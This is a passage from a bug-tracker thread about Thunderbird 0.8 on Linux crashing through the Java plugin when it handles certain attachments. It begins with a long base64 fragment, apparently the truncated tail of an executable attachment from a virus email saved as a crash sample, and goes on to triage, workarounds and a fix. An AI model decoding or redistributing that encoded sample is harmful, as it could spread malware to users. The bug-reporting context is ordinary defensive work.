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
AAAAAAEAZQAAAIgAAIAAAAAAAAAAAAAAAAAAAAEABwQAAKAAAAAAAAAAAAAAAAAAAAAAAAEA
BwQAALAAAAAAAAAAAAAAAAAAAAAAAAEABwQAAMAAAADQkAEA6AIAAAAAAAAAAAAAuJMBACgB
AAAAAAAAAAAAAOCUAQAiAAAAAAAAAAAAAAAoAAAAIAAAAEAAAAABAAQAAAAAAIACAAAAAAAA
AAAAAAAAAAAAAAAAzP//AGhXWAAAAAAAgICAAP///wDAwMAA/wAAAAD//wC/AAAAAAD/AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAACIhEiIiIiIiIiIiIiIiIiIiITVVVVVVVVVVVVVVJSIi
IiNERERERERERERERFJSIiIjREREREREVVRERVVSUiIiI0SIiIhESZlERJmUUlIiIiNERERE
RESVRERJVFJSIiIjRIiIiIhESVVVWVRSUiIiI0RERERERESZmZlUUlIiIiNEiIiIiIhESVRJ
VFJSIiIjRERERERERESVSVRSUiIiI0SIiIiIiIhESVlUUlIiIiNERERERERERESZVFJSIiIj
RIiIiIiIiIhESURSUiIiI0REREREREREREREUlIiIiNEiIiIiIiIiIiIRFJSIiIjRERERERE
RERERERSUiIiI0SIiIiIiIiIiIhEUlIiIiNERERERERERERERFJSIiIjRCIiIiJEiIiIiERS
UiIiI0Q5kkRCREREREREUlIiIiNEMiIiIkSIiIiIRFJSIiIjRDRCd3JERERERERSUiIiI0Qy
IndyRIiIiIhEUlIiIiNENEJ3ckRERERERFJSIiIjRDRCZmJERERERERSUiIiI0Q0QmZiRERE
REREUlIiIiNEMzIiIkRERERERFJSIiIjRERERERERERERERSUiIiI0JEJEJEJEJEJEJEMlIi
IiNCRCRCRCRCRCRCRDJSIiIiJDNDNDNDNDNDNDNDIiIiIiIiIiIiIiIiIiIiIiIi4AAAD+AA
AAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH
4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AA
AAfgAAAH+AAAD/////8oAAAAEAAAACAAAAABAAQAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAgAAAgAAAAICAAIAAAACAAIAAgIAAAMDAwACAgIAAAAD/AAD/AAAA//8A/wAAAP8A
/wD//wAA////AAAAAAAAAAAAAHd3d3d3cAAA//+f/59wAAD//3mZn3AAAPRE95+fcAAA////
eZ9wAAD0RET3n3AAAP//////cAAA9ERERE9wAAD//////3AAAPRERERPcAAA//////9wAAD/
/////3AAAPDw8PDw8AAAD4+Pj4+AAAAAAAAAAAAAwAcAAMADAADAAwAAwAMAAMADAADAAwAA
wAMAAMADAADAAwAAwAMAAMADAADAAwAAwAMAAMADAADABwAA6q8AAAAAAQACACAgEAABAAQA
6AIAAAEAEBAQAAEABAAoAQAAAgAAAAAAAAD/


------=_NextPart_000_0014_000013B5.0000750A--




--9B095B5ADSN=_01C486C879290560000165EEmailserver.unyts--

plussing for 1.0. We neeed to figure out why my packaging trick to strip out the
plugin dll isn't working anymore for linux. 
Status: RESOLVED → REOPENED
Flags: blocking-aviary1.0+
Resolution: FIXED → ---
*** Bug 260311 has been marked as a duplicate of this bug. ***
I have renamed all the plugin.xpt files I could find:

/usr/local/share/MozillaFirebird/components/plugin.xpt
/usr/local/share/firefox/components/plugin.xpt

and all the libgkplugin.so files:

/usr/lib/mozilla-1.4.2/components/libgkplugin.so
/usr/local/share/MozillaFirebird/components/libgkplugin.so

Thunderbird version 0.8 (20040913) under Linux still crashes on my two 'trophy
emails' that I've saved, with the error on the console:

INTERNAL ERROR on Browser End: Could not get the JVM manager
System error?:: Success

Distribution is Red Hat 9; Linux version 2.4.20-30.9
(bhcompile@daffy.perf.redhat.com) (gcc version 3.2.2 20030222 (Red Hat Linux
3.2.2-5))
This crashed thunderbird 0.8 20040913 on a linux fedora core 2 box.  It is a
pif attachment email, I've been getting a lot of junkmail that crashes
thunderbird since I upgraded from 0.6
Attachment #161363 - Attachment filename: junkmail_with_pif_attachment.pif → junkmail_with_pif_attachment.eml
Attachment #161363 - Attachment mime type: application/octet-stream → message/rfc822
Thunderbird version 0.8 (20040913), Linux Fedora Core 2
Occurs when sending email with multiple (5) plain-text (PHP) files

1. Compose
2. Attach files
3. Send - Dies with error:
INTERNAL ERROR on Browser End: Could not get the JVM manager
System error?:: Success




Hi all
I'm running TB 0.8 from the latest official release on a Fedora Core 2 box,
2.6.6-1.435smp i686

Apart from simply quoting what other people already said, I found out the Java
plugin is called in the game only with certain types of file extension.

My crashing was dued to a .scr file, but I can make the whole message display
correctly simply changing 

Content-Type: application/octet-stream; name="Price.scr"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Price.scr"

to , for istance, 
Content-Type: application/octet-stream; name="Price.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Price.exe"

Maybe it's not a wonderful workaround... but it keeps my java plugin where it is.
i am running gentoo and thunderbird 0.8, rather trying to.
everytime i hit the compose mail button thunderbird crashes with JVM error. I
have sun jdk 1.4.2.05 installed.....
Has anyone been able to reproduce this with a Talkback enabled build?  If so,
please post your Talkback IDs here so I can take a look at the Talkback data for
more helpful info in tracking this bug down.  Thanks.
hey jay, there isn't a talkback crash as our application never crashes. The java
process kills the mozilla process so the process just dies. There is no client
triggered crash with a stack trace that would fire up talkback since we are
getting told to abort.
forgot to carry over this from bug 141826 comment 40: after installing jvm1.5.0
(and adding the appropriate symlink), I no longer crash tbird when I send an
attachmen with no extension (or a .conf extension --both somehow get the java
mimetype).
(In reply to comment #46)
> Created an attachment (id=161363)
> Junk mail that crashed thunderbird 20040913
> 
> This crashed thunderbird 0.8 20040913 on a linux fedora core 2 box.  It is a
> pif attachment email, I've been getting a lot of junkmail that crashes
> thunderbird since I upgraded from 0.6

Yup. Crashes mine, too.
Talkback won't catch this crash under my 0.8 (20040913) build, but I can
consistently reproduce it by enabling the Java plugin, clicking
File->New->Message and then selecting an identity with a signature file
associated (my default identity has no sig).

Trace attached of the child process that is crashing.
Attached file strace of crashing process (obsolete) —
Attachment #163423 - Attachment is obsolete: true
Our official comment for this bug is to now upgrade your version of Java to:

jvm1.5.0

apparently the new version of Java no longer aborts the Thunderbird process
which is what was happening before. 

Please report back here if after upgrading to 1.5.0 (or higher), it still ends
up aborting our process.
Status: REOPENED → RESOLVED
Closed: 16 years ago15 years ago
Resolution: --- → FIXED
Target Milestone: Thunderbird0.6 → Thunderbird0.9
Due to some internal app requirements, JVM 1.4.2 is the only plugin available.
Others likely have similar internal requirements/restrictions, which makes this
particular solution non-workable.

Wouldn't the ability to disable this plugin in tb be an option?
Since I have upgraded to j2sd-1.5.0, Thunderbird doesn't crash anymore. However,
every now and then Firefox crashes. Didn't yet figure out if this is java
related though.

Leon.
(In reply to comment #59)
> Since I have upgraded to j2sd-1.5.0, Thunderbird doesn't crash anymore. However,

CORRECTION: first, it should've been j2sdk-1.5.0, and more important, secondly,
Firefox hangs whenever I try to open a page with a java applet. Can't even kill
the process, have to reboot.
*** Bug 266587 has been marked as a duplicate of this bug. ***
Why is the jvm being treated as the scapegoat here?  IOW, why are we solving a
symptom of the problem instead of the actual problem.  If thunderbird shouldn't
be using plugins, then either don't compile plugin support into the static
binary or programatically disable it.  Or use a separate plugin directory for
thunderbird like I suggested in bug 171561 since my firefox plugins shouldn't
affect thunderbird at all (wasn't that part of the point of app separation?). 
All you're doing in comment 57 is advising people to remove the "troublesome"
plugin that exposes the real problem.

More on topic, I hit this problem as well.  It was in a piece of virus email
that I received.  I'm not sure how it knew to invoke the jvm from this base64
enocded .scr attachment but it raises a red flag that maybe that same method
could be used to invoke a plugin that I *do* have installed and cause damage
(especially if I triggered the problem under windows).  Upgrading the jvm isn't
going to address that problem.  The crash occurs even if I try to view the
message body as plaintext, btw.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Depends on: 233323, 266750
Thanks for working on this Chris! I'd like to take this change on the branch and
am happy to check it in assuming everyone is happy with the discussion in the
disable-plugins bug. 
fixed on the 1.0 branch. Thanks a lot for the patch Chris. 
Keywords: fixed-aviary1.0
marking fixed. I'm intentionally leaving plugins on in the trunk builds for now.

Status: REOPENED → RESOLVED
Closed: 15 years ago15 years ago
Resolution: --- → FIXED
*** Bug 259597 has been marked as a duplicate of this bug. ***
vrfy'd fixed with 2004112206-0.9 on linux fc2.
Status: RESOLVED → VERIFIED
*** Bug 273872 has been marked as a duplicate of this bug. ***
*** Bug 260994 has been marked as a duplicate of this bug. ***
You need to log in before you can comment on or make changes to this bug.